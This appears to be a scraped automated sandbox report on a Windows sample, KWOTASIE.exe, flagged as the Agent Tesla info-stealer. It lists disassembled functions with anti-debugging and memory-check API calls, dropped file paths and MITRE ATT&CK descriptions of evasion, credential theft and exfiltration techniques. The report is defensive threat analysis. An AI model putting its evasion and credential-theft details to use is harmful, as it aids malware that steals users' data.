lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8

Analysis Process: wab.exePID: 5032, Parent PID: 2888COMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	8.8%
Total number of Nodes:	34
Total number of Limit Nodes:	5

Executed Functions

Function 003370A0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00337117

Memory Dump Source

Source File: 00000006.00000002.3277464001.0000000000330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_330000_wab.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 33e8afddffa1bd3cc157d1d27b95be032f4e017a823c0e4be48b1f0e46534dc8
Instruction ID: 67d70e9a9882ef981a97e4cd6283d28080f53adef155a50f09eb1bd63bd15ab8
Opcode Fuzzy Hash: 33e8afddffa1bd3cc157d1d27b95be032f4e017a823c0e4be48b1f0e46534dc8
Instruction Fuzzy Hash: D82128B6C00259CFCB10CF9AD884BEEBBF4EF49310F14845AE455A7251D778A944CF61

Function 0033F0F8 Relevance: 1.6, APIs: 1, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.3277464001.0000000000330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_330000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a9c0f683203880aad6c0613897c89ffb05b720976c6564af3c3e98e86a01860
Instruction ID: 30c97973235e80d336c6b3be6d6437b94206d670a0d5c1b6a7d3ec7e8ab3ccf8
Opcode Fuzzy Hash: 7a9c0f683203880aad6c0613897c89ffb05b720976c6564af3c3e98e86a01860
Instruction Fuzzy Hash: 42412672E043998FCB05CFAAD8446DEBBF1EF89310F15856AD808E7241DB749985CBD0

Function 0033709A Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00337117

Memory Dump Source

Source File: 00000006.00000002.3277464001.0000000000330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_330000_wab.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: bdb3efb60e71d907b838016a7d7af6c2fe83a30cc6a4b889e57cc4232ea68ff9
Instruction ID: 3cd1e1a7322682c2d664df9167371ca10ea77c871c805d43a5f93fcaac6ff45b
Opcode Fuzzy Hash: bdb3efb60e71d907b838016a7d7af6c2fe83a30cc6a4b889e57cc4232ea68ff9
Instruction Fuzzy Hash: 272124B68002598FCB10CFAAD884BEEBBF4AF49325F14846AE459A7251C7789945CF60

Function 0033F1C8 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0033F237

Memory Dump Source

Source File: 00000006.00000002.3277464001.0000000000330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_330000_wab.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 7db866739a56487bc5b5a37d67f8f3b52fa926fc413d7874f30cffb3e58d1bc3
Instruction ID: 7ccd1d3fbdb99b39c158c42d5a20a8b731a84beb9ebcc0a2270a3435e64f1331
Opcode Fuzzy Hash: 7db866739a56487bc5b5a37d67f8f3b52fa926fc413d7874f30cffb3e58d1bc3
Instruction Fuzzy Hash: D411F2B6C00659DBCB10CFAAD544BDEFBB4EF48320F15856AD818A7240D778A945CFA1

Function 0030D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3277197408.000000000030D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0030D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30d000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dc4a33513dc9672f5de09583c28dd40d9b5717f378f780db7674a232981f9ca
Instruction ID: 87e196e980194191038a3970fc06aee72c24cd8f34b182af5f2b5fb3f20e51ce
Opcode Fuzzy Hash: 6dc4a33513dc9672f5de09583c28dd40d9b5717f378f780db7674a232981f9ca
Instruction Fuzzy Hash: 2A2134B1604200DFCB16DF94D9D0B26BBA5FB84324F24C56DE80D0B286C33AD807CA62

Function 0030D02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3277197408.000000000030D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0030D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30d000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 514af54206d14070911bcb77176ee4a8fbb755271f114173e67c966e1f406a1e
Instruction ID: 928ace452f01ef3c4e3c8bdac719f5feebdc0b45e4d4829bdc6c576e4ad9d03a
Opcode Fuzzy Hash: 514af54206d14070911bcb77176ee4a8fbb755271f114173e67c966e1f406a1e
Instruction Fuzzy Hash: 5311DD75504280CFCB16CF54D9D4B15FFA1FB84314F28C6AED8494B696C33AD84ACB62

Non-executed Functions

Function 0033FB24 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3277464001.0000000000330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_330000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf11b5a0fc70c7984f8b97abd6b01cbef11296de7f3f5a1f3ac0c7204bd221e0
Instruction ID: 585dfe7c630eef6af05e8035b6afb07ec06e820647cb13ddb133a03f9279b789
Opcode Fuzzy Hash: cf11b5a0fc70c7984f8b97abd6b01cbef11296de7f3f5a1f3ac0c7204bd221e0
Instruction Fuzzy Hash:

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KWOTASIE.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Innoxious\Leddelingernes.Gir

C:\Users\user\AppData\Local\Innoxious\Phantasies.ude

C:\Users\user\AppData\Local\Innoxious\arbejdssociologens.huf

C:\Users\user\AppData\Local\Innoxious\codium.ant

C:\Users\user\AppData\Local\Innoxious\dumheds.txt

C:\Users\user\AppData\Local\Innoxious\fibrisers.fot

C:\Users\user\AppData\Local\Innoxious\induktionskogezoner.mid

C:\Users\user\AppData\Local\Innoxious\kvindeemancipations.alt

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dg2c4d2n.pyl.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvqolrje.mkf.ps1

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
KWOTASIE.exe

Function 0040333D Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 412
stringfilecomCOMMON

Function 004053EF Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 284
windowclipboardmemoryCOMMON

Function 0040595A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 0040658F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Function 00403D08 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 346
windowstringCOMMON

Function 0040395A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 0040626E Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004052B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004065B6 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Function 0040577F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 00405D6D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre